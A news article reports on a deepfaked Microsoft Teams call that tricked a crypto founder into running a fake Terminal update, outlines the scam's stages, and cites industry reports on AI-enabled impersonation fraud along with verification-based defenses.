A crypto founder experienced a security breach after joining what seemed like a legitimate Microsoft Teams call with Pierre Kaklamanos, a known contact from the Cardano Foundation. The impostor used Pierre’s name to initiate a conversation about Atrium and sent an invite that appeared normal. On the call, the attacker replicated Pierre’s face and voice convincingly, accompanied by two other supposed foundation members.
When technical issues forced him off the call, he encountered a prompt claiming his Teams software was outdated, requiring reinstallation via Terminal. He executed the command before shutting down his laptop to preserve battery life, which fortunately mitigated potential damage.
Despite being technically adept, the founder fell victim due to the attack’s convincing context. Social engineering exploits familiarity and has historically required either account compromise or extensive rapport-building. However, the video call now serves as a trusted authentication method that can be easily mimicked.
In February and March 2026, Microsoft documented phishing campaigns involving malicious files disguised as workplace applications like msteams.exe and zoomworkspace.clientsetup.exe. These attacks simulated legitimate Teams and Zoom workflows. Additionally, Microsoft warned of “ClickFix”-style prompts targeting macOS users, asking them to input commands into Terminal. These threats targeted browser passwords, crypto wallets, cloud credentials, and developer keys.
Google Cloud’s Mandiant unit reported a similar attack structure in the crypto space involving a compromised Telegram account, spoofed Zoom meetings, and deepfake-style executive videos. While they couldn’t verify if an AI model generated these videos, they confirmed the use of fake meetings and AI tools for social engineering.
On April 24, Pierre Kaklamanos publicly acknowledged his Telegram had been hacked on X, warning others against using the account to avoid falling victim to similar scams. The attacker used the compromised account to suggest rescheduling a meeting on Google Meet, maintaining their ruse post-call and signaling an ongoing campaign.
The incident highlights several stages of the scam:
– **Initial Outreach:** The impostor reached out about Atrium for a call, leveraging past interactions to rebuild trust.
– **Meeting Setup:** A Microsoft Teams invite was sent, utilizing familiar business workflows.
– **Live Call:** The attacker used deepfake techniques to replicate Pierre’s appearance and voice, reducing suspicion.
– **Call Disruption:** Technical issues were simulated to prompt the victim to install a fake update through Terminal.
– **Fake Update Prompt:** A software update message was displayed, exploiting familiarity with routine app fixes.
– **Command Execution:** The victim executed malicious commands before shutting down his laptop.
– **Post-call Follow-up:** The attacker continued interacting as Pierre, maintaining credibility for future attempts.
OpenAI’s launch of its 4o image generation model in March, capable of producing “precise, accurate, photorealistic outputs,” underscores the heightened risk. This advancement could enable more convincing deepfakes, elevating the threat level.
The World Economic Forum noted that generative AI lowers phishing barriers by creating credible deepfake audio and video. INTERPOL identified financial fraud as a rapidly evolving transnational crime in March 2026, highlighting impersonation tools like deepfake videos and chatbots.
Chainalysis reported crypto scams reached $17 billion in 2025, with impersonation scams increasing by 1,400% year over year. AI-enabled scams generated revenue four times greater than traditional methods, driven by high-value targets, fast settlement rails, and informal communication practices in the crypto world.
Zoom announced a partnership on April 17 to enhance meeting security through human verification tools like “Verified Human” badges and “Deep Face Waiting Rooms.” Gartner predicts that by 2027, half of enterprises will invest in disinformation-security products or TrustOps strategies, compared to less than 5% today.
In an optimistic scenario, widespread adoption of verification tools increases friction for attackers. However, if AI-generated impersonation advances faster than defenses, relationship hijacking could become routine, with each breach feeding the next scam.
Successful mitigation involves verifying sensitive requests across multiple channels using known phone numbers, hardware keys, shared passphrases, or internal systems. Conversely, reliance on video calls as identity proof remains a vulnerability if deepfake and impersonation tools continue to improve without corresponding defense enhancements.